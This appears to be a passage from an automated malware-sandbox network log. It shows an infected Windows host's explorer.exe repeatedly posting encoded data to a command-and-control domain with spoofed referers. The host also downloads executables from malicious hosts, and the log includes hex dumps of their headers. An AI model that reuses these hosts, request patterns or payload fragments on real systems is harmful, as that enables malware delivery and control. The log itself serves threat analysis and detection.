                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://mlwynhpbb.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 272
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:04:43.933253050 CET3857INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:43 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: close


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                25192.168.2.34980595.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:44.026300907 CET3858OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://njupmvh.com/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 168
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:04:44.125761032 CET3860INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:44 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 88 55 13 26 14 f9 aa 89 ff a2 1e b7 08 93 31 f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 30I:82OU&1UPJ$dP0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                26192.168.2.34980895.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:44.522725105 CET3864OUTGET /game.exe HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: host-file-host-3.com
                                                                                                                                                                                Dec 1, 2021 10:04:44.605958939 CET3866INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:44 GMT
                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                Content-Length: 351744
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Last-Modified: Wed, 01 Dec 2021 09:04:02 GMT
                                                                                                                                                                                ETag: "55e00-5d211f48282b5"
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bf 4f 57 03 fb 2e 39 50 fb 2e 39 50 fb 2e 39 50 68 60 a1 50 fa 2e 39 50 94 58 92 50 d5 2e 39 50 94 58 a7 50 e2 2e 39 50 94 58 93 50 79 2e 39 50 f2 56 aa 50 f8 2e 39 50 fb 2e 38 50 18 2e 39 50 94 58 96 50 fa 2e 39 50 94 58 a3 50 fa 2e 39 50 94 58 a4 50 fa 2e 39 50 52 69 63 68 fb 2e 39 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 96 a5 06 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 fe 03 00 00 40 09 00 00 00 00 00 40 cf 01 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 0d 00 00 04 00 00 f5 45 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 f8 03 00 28 00 00 00 00 e0 0c 00 c0 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0d 00 30 1d 00 00 c0 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 c4 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 be fc 03 00 00 10 00 00 00 fe 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 40 cc 08 00 00 10 04 00 00 de 00 00 00 02 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c0 40 00 00 00 e0 0c 00 00 42 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 3b 00 00 00 30 0d 00 00 3c 00 00 00 22 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 fb 03 00 b6 fb 03 00 ca fb 03 00 de fb 03 00 ec fb 03 00 00 fc 03 00 16 fc 03 00 34 fc 03 00 4a fc 03 00 5a fc 03 00 6c fc 03 00 8c fc 03 00 a2 fc 03 00 b4
                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$OW.9P.9P.9Ph`P.9PXP.9PXP.9PXPy.9PVP.9P.8P.9PXP.9PXP.9PXP.9PRich.9PPEL_@@@pE(@00@l.text `.data@@.rsrc@B@@.reloc;0<"@B4JZl


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                27192.168.2.34981495.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:46.816389084 CET4236OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://mjghwr.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 346
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:04:46.913688898 CET4249INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:46 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                28192.168.2.34981595.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:47.279380083 CET4253OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://unuta.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 254
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:04:47.379863024 CET4254INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:47 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                29192.168.2.34981695.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:47.469691992 CET4255OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://fucabofxh.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 197
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:04:47.572196960 CET4256INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:47 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: close


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                3192.168.2.34975195.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:26.750736952 CET1099OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://piyyyphtem.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 257
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:04:26.852677107 CET1100INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:26 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                30192.168.2.34981795.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:47.663691044 CET4257OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://guasgjf.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 247
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:04:47.766128063 CET4257INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:47 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 7b b8 43 12 c3 55 a1 b9 67 e3 25 58 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e5 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 46I:82OOj{CUg%XQAc}yc0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                31192.168.2.34981895.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:47.901993036 CET4258OUTGET /downloads/toolspab3.exe HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: privacytoolzforyou-7000.com
                                                                                                                                                                                Dec 1, 2021 10:04:47.983998060 CET4260INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:47 GMT
                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                Content-Length: 336896
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Last-Modified: Wed, 01 Dec 2021 09:04:01 GMT
                                                                                                                                                                                ETag: "52400-5d211f4808eb5"
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bf 4f 57 03 fb 2e 39 50 fb 2e 39 50 fb 2e 39 50 68 60 a1 50 fa 2e 39 50 94 58 92 50 d5 2e 39 50 94 58 a7 50 e2 2e 39 50 94 58 93 50 79 2e 39 50 f2 56 aa 50 f8 2e 39 50 fb 2e 38 50 18 2e 39 50 94 58 96 50 fa 2e 39 50 94 58 a3 50 fa 2e 39 50 94 58 a4 50 fa 2e 39 50 52 69 63 68 fb 2e 39 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 84 c6 f3 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c4 03 00 00 40 09 00 00 00 00 00 c0 95 01 00 00 10 00 00 00 e0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 0d 00 00 04 00 00 c9 6e 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 be 03 00 28 00 00 00 00 b0 0c 00 c0 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 30 1d 00 00 c0 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 8b 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3e c3 03 00 00 10 00 00 00 c4 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 40 cc 08 00 00 e0 03 00 00 de 00 00 00 c8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c0 40 00 00 00 b0 0c 00 00 42 00 00 00 a6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 b6 3b 00 00 00 00 0d 00 00 3c 00 00 00 e8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 c2 03 00 36 c2 03 00 4a c2 03 00 5e c2 03 00 6c c2 03 00 80 c2 03 00 96 c2 03 00 b4 c2 03 00 ca c2 03 00 da c2 03 00 ec c2 03 00 0c c3 03 00 22 c3 03 00 34
                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$OW.9P.9P.9Ph`P.9PXP.9PXP.9PXPy.9PVP.9P.8P.9PXP.9PXP.9PXP.9PRich.9PPEL_@@@n(@08@l.text> `.data@@.rsrc@B@@.reloc;<@B(6J^l"4


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                32192.168.2.34982095.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:51.255196095 CET7116OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://bfwtp.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 110
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:04:51.352677107 CET7117INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:51 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
